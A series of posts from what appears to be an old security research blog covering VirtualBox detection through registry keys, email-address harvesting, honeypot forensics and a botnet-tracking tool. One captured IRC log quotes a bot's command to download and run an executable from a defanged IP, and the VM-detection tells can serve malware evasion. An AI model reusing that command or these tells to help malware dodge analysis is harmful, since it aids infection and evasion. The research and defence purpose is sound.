onHacks

Earlier I wrote a brief article on the theory of VM detection at “Concept of Virtual Machines and Honeypots Detection Techniques“. This time we will talk about technical details. As I use VirtualBox myself, this is one of the ways you can detect VirtualBox :

Under the registry key :

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\

VideoBiosVersion = VBOX   – 1

SystemBiosVersion = Sun xVM VirtualBox Version 2.1.4_OSE VGA BIOS
Sun xVM VirtualBox Version 2.1.4_OSE VGA BIOS
Sun xVM VirtualBox Version 2.1.4_OSE
Sun xVM VirtualBox Version 2.1.4_OSE
VirtualBox Version 2.1.4_OSE VBE Display Adapter
VirtualBox Version 2.1.4_OSE VBE Display Adapter

The above information indicates presence of VirtualBox.And there are even more giveaways!

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\VBOX__
HKEY_LOCAL_MACHINE\HARDWARe\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0

Identifier = VBOX HARDDISK

HKEY_LOCAL_MACHINE\HARDWARe\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0

Identifier = VBOX CD-ROM

There are also hints in Device Manager, too. It can be easily queried programmatically.

DVD/CDROM : VBOX CD-ROM
Harddisk : VBOX HARDDISK

That’s just one solution. I strongly suggest to read Peter Ferrie’s paper.

I have found some resources for those interested : a Virtual Machine Threats paper and slide by Peter Ferrie ( Microsoftie now ), and Marshall Fryman blog entries here and here, and a codeproject demonstration. I hope you guys will find them useful.

===

A brief update. I haven’t been active for these 2 months. Since September I have been in involved some personal matters that took my time, and in October I just got onboard a new job (I was a developer for a server antivirus software for Microsoft Office SharePoint Server). Well, it isn’t about anticrime but the topic of cloud security.

Cloud security! Who haven’t heard of it?

My new job is to work on cloud computing on Windows Azure. Unfortunately I cannot reveal more. But don’t worry, I’m very serious in my anti-cybercrime endeavors. =)

Avert Labs got a new research paper out : “Inside the Password-Stealing Business: the Who and How of Identity Theft.” . For those interested in the underground economics, you should take a look! Multi-lingual report link doesn’t seem to work : http://www.avertlabs.com/research/blog/index.php/2009/09/24/inside-the-password-stealing-business/ .

Games have always been a big business, just that it’s the same for the underground, too. A lot of money, even if you’re the good guys. On the other hand, you haven’t heard people pirating “Microsoft High Performance Computing Cluster” CDs, right? =) Oh, and hey, they sell OK, and in China. There’s really money there. Yada yada…

Another thing though, as if getting infected is not enough, malware (Zbot here) could put you into legally trouble. It is no news that victims are being used as stepping stone for futher crime, and you really need proof that you are not. Zbot goes further by rendering your computertotally unusable by wiping out the registry HKEY root keys. This is enough to force a user to immediately formatting, thus killing all chances for forensics. Behind bars anyone?

I disappeared again after my last post talking about spam collections and DNS misconfigurations. Today, I read log0′s post which he is calling for bots/ tools for his security research. Did you see anything familiar to you? How log0 is showing his contact to us, “log0 [ at ] gmail [ dot ] com”. We were using this format for quite some time, after we realized that showing full form of our address (eg. spam@onhacks.org) increases the chance that our email get exposed to spammers.

However, these kinds of representation already appeared on the Internet for last few years. Did you ever think of one fact is that: A clever spammers just need to modify few lines of code in their bots, changing the target strings they are looking for, then everything is just working as the same as in the past.

The most interesting thing is that RSnake has blogged his finding on this form of email representation last Tuesday. In short, he has googled with “at gmail dot com”, and surprisingly there are at least 6 email addresses in the first result page. There are many variations, but they all have the same pattern, here are some examples:

spam  at  onhacks  dot  com
spam [at] onhacks [dot] com
spam (at) onhacks (dot) com
spam <at> onhacks <dot> com
spam “at” onhacks “dot” com

(Obviously, I am trying my best to let spammers know my address)

I spent an hour to write a very simple PoC parser to retrieve email addresses from the result page mentioned above. Obviously there are at least 4 valid email addresses, it is not too hard to get those email addresses by bots. The parser is just looking for 1 ‘at’ and 1 ‘dot’ keyword appears sequentially in the pattern: [any word] “at” [any word] “dot” [any word]. The code is poorly written, I will improve it later this week.

It is not so difficult to discover the pattern between these email addresses, just a piece of cake even for primary students. Then, what kind of representation we should use to show our email address on the Internet? Display the jpeg of the email? Without adding noises to the image, it is as easy as just performing text recognition. With noises on the image, it is more like CAPTCHA. Since most of the CAPTCHA solver aims on specific type of CAPTCHA, it may takes more time to decrypt an “encrypted” email using CAPTCHA. However, it is not unsolvable.

What is the takeaway then? Better not showing your address on web! Or encrypt it into CAPTCHA, at least your email address has less chance being captured by spammers.

As mentioned earlier, I am working to build a fully automated botnet tracking tool (hopefully, I can start wrapping up all my tools useful for the public, and some data feeds later.).

I need a large sample of different varieties of HTTP bots. I have not captured many life working samples of HTTP bots.

Could someone share me PCAPs/Binaries of HTTP Bot? ( Or also the MD5sum ? ). Please kindly send to log0 [ at ] onhacks [ dot ] org . Thanks!

SecurityTube – Security related video tutorial, have fun learning!.

The Hong Kong chapter of Honeynet, led by Peter Cheung and Roland Cheung, has produced two walkthroughs on their high interaction honeypot findings, windows and linux. There are not many detailed walkthrough out there, and hence I wrote one. They gave a detailed (with images!) walkthrough on how to do forensics on a honeypot. I encourage avid learners to take a step and get something out of them.

Windows

http://www.honeybird.hk/project/wp-content/uploads/2009/04/honeypot-study-windows-2008.pdf

Linux

http://www.honeybird.hk/project/wp-content/uploads/2009/02/honeypot-study-linux-2008.pdf

(Hey.. I really don’t know the Chinese term for Forensics…) I got the term from 冰血封情 on  EvilOctal .. it’s 取証. Thanks. =)

Large real PCAP datasets, food!

MU Dynamics released some PCAPs obtained from the SHMOO Group and wrapped the total of 15.0 GBytes, 26.3 million packets with indexing. According to SHMOO Group , “This archive contains data logged during the Capture the Flag Contest at DefCon. The Shmoo Group is publishing this data to promote the creation of more secure software and to offer data for research purposes.” For research purposes, now here comes the game to brainstorm. Go grep it if anyone needs it.

In case you don’t know, SHMOO Group’s SHMOOCON got some really high quality presentation and the best people from the security field to present each year. You should take a good look there to learn.

I’ve read this earlier but only posted it now… oops… I felt it is worth to share.

Innovative? Take a look :

http://asert.arbornetworks.com/2009/08/twitter-based-botnet-command-channel/

Now makes us think of the other forum boards such as Baidu Tieba, Google’s, 2ch? =)

I am currently developing a tool to automate tracking botnets. Input is a folder of binaries, and output is endless bot logs (commands, conversations, how they work), plus (possibly unseen. undetected) malware binaries and hopefully automated analysis too. =)

Here is something my tool caught while I was testing on a botnet. I used one of the malware binaries caught by my honeypot to infiltrate the botnet =) They are paying off!

2009-08-23 18:27:20,644 – log-6 – INFO – Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]

There is some Deutsch (German) stuffs… not necessarily their stuffs though. Disconnected me.

ERROR :Closing Link: [[<my ip, removed!!!>] (Client hat die Verbindung getrennt)

The binary is very new, just 4 hours ago at 2009-08-23 18:27:20,644 ( GMT +8 ).

The binary at http://94[dot]76[dot]194[dot]116/xx8.exe (MD5sum : 7904937c07c031e81023dbd81ac93b64) has VirusTotal results :

File winhost.exe received on 2009.08.22 15:54:06 (UTC)
Current status: finished

Result: 6/41 (14.63%)

Antivirus	Version	Last Update	Result
a-squared	4.5.0.24	2009.08.22	-
AhnLab-V3	5.0.0.2	2009.08.21	-
AntiVir	7.9.1.3	2009.08.21	-
Antiy-AVL	2.0.3.7	2009.08.21	-
Authentium	5.1.2.4	2009.08.22	-
Avast	4.8.1335.0	2009.08.21	-
AVG	8.5.0.406	2009.08.22	Worm/Generic.AHOV
BitDefender	7.2	2009.08.22	-
CAT-QuickHeal	10.00	2009.08.22	-
ClamAV	0.94.1	2009.08.22	-
Comodo	2058	2009.08.22	-
DrWeb	5.0.0.12182	2009.08.22	BackDoor.IRC.Bot.127
eSafe	7.0.17.0	2009.08.20	-
eTrust-Vet	31.6.6694	2009.08.21	-
F-Prot	4.4.4.56	2009.08.22	-
F-Secure	8.0.14470.0	2009.08.21	-
Fortinet	3.120.0.0	2009.08.22	PossibleThreat
GData	19	2009.08.22	-
Ikarus	T3.1.1.68.0	2009.08.22	-
Jiangmin	11.0.800	2009.08.21	-
K7AntiVirus	7.10.825	2009.08.22	-
Kaspersky	7.0.0.125	2009.08.22	Net-Worm.Win32.Kolab.dpo
McAfee	5716	2009.08.21	-
McAfee+Artemis	5716	2009.08.21	Artemis!7904937C07C0
McAfee-GW-Edition	6.8.5	2009.08.22	-
Microsoft	1.4903	2009.08.22	-
NOD32	4358	2009.08.22	-
Norman	6.01.09	2009.08.21	-
nProtect	2009.1.8.0	2009.08.22	-
Panda	10.0.0.14	2009.08.22	-
PCTools	4.4.2.0	2009.08.22	-
Prevx	3.0	2009.08.22	Low Risk Adware
Rising	21.43.50.00	2009.08.22	-
Sophos	4.44.0	2009.08.22	-
Sunbelt	3.2.1858.2	2009.08.22	-
Symantec	1.4.4.12	2009.08.22	-
TheHacker	6.3.4.3.385	2009.08.22	-
TrendMicro	8.950.0.1094	2009.08.22	-
VBA32	3.12.10.9	2009.08.22	-
ViRobot	2009.8.22.1897	2009.08.22	-
VirusBuster	4.6.5.0	2009.08.21	-

Detection rate 14.63%! Only 6/41 scanners detected it. Except Kaspersky, AVG, and DrWeb, the other 3 seems to give uncertain generic results.

Which scanner are you using?

In “Who is Hacking Me?“, I mentioned using Nmap to do a service probe on a low interaction honeypot. I wrote briefly how to do it in my last post. The “How” part of this article [add link to the previous article] is not uninteresting, but it is the “Why” part I’d like to focus on. You know, we hackers know why things are done so, not just how. So,

Why does the methodology work?

First, ask yourself :

How do you tell a human from a computer?

The CAPTCHA solution : You test the target to recognize some text in an image. If the target passed the test, it’s likely human. If not, it’s likely computer. The idea is that computers cannot do image recognition well, and actually quite bad.

Generalizing, we ask the target to do things only a human can do well but not computers. If the target being tested fails our human test, we conclude it with certain confidence that it is not human.

Well, CAPTCHA works for computers and humans. What about real services and emulated services?

In the same manner, the concept is that : an emulated service and a real service is technically different in implementation, and that difference makes them distinguishable. By targetting these differences, it gives you a hint to the identity of the service.

Let’s go through yet another real example. One question people loves to ask is :

How do I analyze a malware with anti-virtual-machine technology? It does not run in my vmware! Should I use a physical machine?

Wait, but it runs in my VirtualBox. Oh!

Go download any SdBot online or any found in the wild. They are normally armed with an anti-VM (anti-virtual machine) module, which stops the bot execution if it detects it’s in a VM. You can try that in VMWare, specifically VMWare. Then, go try it in VirtualBox. But, save yourself some time, I have tested already. =)

Wrong question, what you shouldask is :

How does the SdBot tell between VMware and a physical machine?

It works because there are technical differences between the implementation of a VM and a physical machine. It is the same idea of emulated services and real services mentioned in the previous article. When I said that it is because of technical differences, it means it is related to its implementation.

Precisely, SdBot running in VirtualBox but not VMware means that SdBot is not anti-VM but anti-VMWare because it is specifically targetting VMWare, but not VirtualBox.

Consider these points :

• VMWare could set a register when a physical machine doesn’t.
• There’s a dhcpd service provided by the VMware which is not generally present in real machines.
• Some instructions in physical CPU are not implemented/supported in VMware.

These techniques are all based on the principle above.

Though, the above also implicated something else : the anti-vm techniques are specific to certain implementations, and you can use some less common virtual machine implementation (VirtualBox, Xen, etc… ) and the SdBot WILL execute, because the anti-vm technique does not apply to VirtualBox, Xen, etc. However, there is no guarantee the anti-vm technique can only hit one implementation, it can target multiple implementation weaknesses.

So, if you have to analyze SdBot in a virtualized environment. You do not need to run it on a physical machine with test automation to take care of the environment. You can create an environment or disable the technique or whatsoever. That is how it works behind the scenes. That goes the same for honeypots in the general idea. So, happy honeypot hunting!